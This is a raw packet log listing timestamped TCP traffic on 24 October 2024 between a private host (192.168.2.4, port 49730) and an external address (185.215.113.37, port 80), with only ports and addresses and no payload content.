Oct 24, 2024 19:29:20.055972099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.055973053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.055973053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.055984974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056005955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056035995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056035995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056041002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056052923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056109905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056109905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056118965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056129932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056140900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056201935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056211948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056222916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056233883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056233883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056282043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056282043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056308031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056319952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056330919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056341887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056354046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056365013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056399107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056531906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056544065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056555986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056597948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056597948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056597948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056636095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056648016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056658030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056668997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056687117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056699038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056709051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.056730032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056730032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056765079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.056765079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.098840952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098876953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098891973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098905087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098920107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098933935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098948956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098963022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098975897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098983049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.098997116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099010944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099025011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099024057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099024057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099040031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099046946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099046946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099065065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099169016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099185944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099203110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099220037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099225998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099226952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099236012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099250078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099292994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099297047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099297047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099298000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099350929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099365950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099395037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099395990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099412918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099419117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099431992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099442959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099447012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099447012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099500895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099500895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099600077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099613905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099627018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099641085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099658966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099673033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099684954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099688053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099688053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099688053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099698067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099725008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099725008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099827051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099838972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099848032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099858999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099867105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099872112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099884987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099898100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099903107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099903107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099909067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099920988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099932909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.099937916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099937916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099972010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.099972010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100070953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100083113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100092888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100105047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100116014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100126982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100138903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100150108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100176096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100176096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100204945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100204945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100330114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100342035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100352049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100362062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100373030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100383997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100395918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100402117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100402117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100402117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100408077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100419998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100446939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100470066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100481033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100491047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100516081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100516081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100621939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100634098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100642920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100652933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100663900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100675106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100677013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100677013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100686073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100697041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100701094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100701094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100708008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100718975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100729942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100742102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100753069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100760937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100760937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100760937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100776911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.100967884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100980997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.100990057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101002932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101013899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101015091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101015091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101025105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101037979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101043940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101048946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101064920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101113081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101113081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101118088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101130009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101140022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101156950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101156950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101157904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101171970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101176023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101183891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101187944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101187944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101196051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101207972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101218939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101229906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101233006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101233006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101233006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101242065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.101259947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101259947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101294041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.101294041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.304810047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.310431004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605432987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605489016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605532885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605566978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605612040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605637074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605637074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605637074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605653048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605704069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605732918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605732918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605737925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605776072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605808973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605843067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605870962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605870962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.605875969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605911970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605945110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.605983019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606004000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606039047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606046915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606071949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606105089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606127024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606143951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606178045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606185913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606211901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606245995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606255054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606281996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606314898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606349945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606349945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606380939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606384993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606420040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606446981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606446981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606468916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606503010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606537104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606551886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606586933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606615067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606616020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606620073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606658936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606662035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606698990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606729031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606729031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606734037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606767893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606796026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606796026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606801033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606836081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606868982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606903076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606931925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606931925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.606936932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.606987953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607022047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607054949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607064009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607064009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607089043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607117891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607121944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607156992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607191086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607204914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607225895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607239962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607260942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607270002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607296944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607319117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607319117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607352972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607388973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607419014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607446909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607446909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607453108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607489109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607522011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607551098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607551098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607556105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607589960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607624054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607630014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607657909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607691050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607697964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607724905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607758999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607765913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607794046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607829094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.607832909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.607878923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:20.705688000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.705730915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:20.707565069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:21.286603928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:21.286670923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:21.292108059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:21.292141914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.076004028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.076188087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:22.181143999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:22.187417030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.468303919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.468343973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.468378067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:22.468414068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:22.468439102 CEST	49730	80	192.168.2.4	185.215.113.37
